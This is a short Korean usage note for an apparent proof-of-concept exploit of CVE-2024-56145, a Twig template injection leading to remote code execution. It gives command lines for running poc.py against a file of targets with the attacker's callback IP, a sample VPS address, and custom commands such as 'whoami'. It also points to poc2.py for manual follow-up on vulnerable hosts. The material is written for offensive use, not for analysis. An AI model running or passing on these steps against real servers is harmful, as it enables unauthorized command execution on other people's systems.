
CVE-2024-56145 SSTI에서 RCE로 - twig 템플릿
fuser -k 6666/tcp
python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200
사용자 정의 명령어는 다음과 같이 사용할 수 있습니다: python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"
-i는 당신의 IP 또는 VPS IP입니다 (ipconfig / ifconfig를 통해 확인).
예시: python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200
이제 무엇을 할까요? 취약한 대상은 찾았지만 더 다루고 싶으신가요? 그래서 poc2.py를 추가했습니다. 이는 대상에 대한 수동 테스트를 위한 것입니다. 사용 방법은 다음과 같습니다:
다음을 실행합니다: fuser -k 6666/tcp

작성자: Chirag Artani (https://x.com/Chirag99Artani)